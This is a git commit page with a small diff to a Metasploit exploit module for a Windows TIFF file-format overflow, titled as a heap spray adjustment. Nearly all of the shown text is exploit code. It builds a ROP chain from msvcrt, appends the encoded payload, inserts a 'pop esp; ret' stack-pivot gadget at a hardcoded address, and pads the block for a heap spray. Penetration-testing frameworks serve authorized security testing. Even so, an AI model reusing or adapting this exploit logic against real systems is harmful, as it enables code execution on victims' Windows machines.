Heap spray adjustment by @jvazquez-r7

2013-11-25 20:50:53 -06:00 · 2013-11-25 20:50:53 -06:00 · 3247106626
parent 385381cde2 4c249bb6e9
commit 3247106626
1 changed files with 3 additions and 1 deletions
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@ -153,7 +153,9 @@ class Metasploit3 < Msf::Exploit::Remote
    p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
    p << payload.encoded
    block  = p
-    block << rand_text_alpha(1024 - p.length)
+    block << rand_text_alpha(1024 - 80 - p.length)
+    block << [ 0x77c34fbf, 0x200f0704 ].pack("V") # pop esp # ret # from msvcrt
+    block << rand_text_alpha(1024 - block.length)

    buf = ''
    while (buf.length < 0x80000)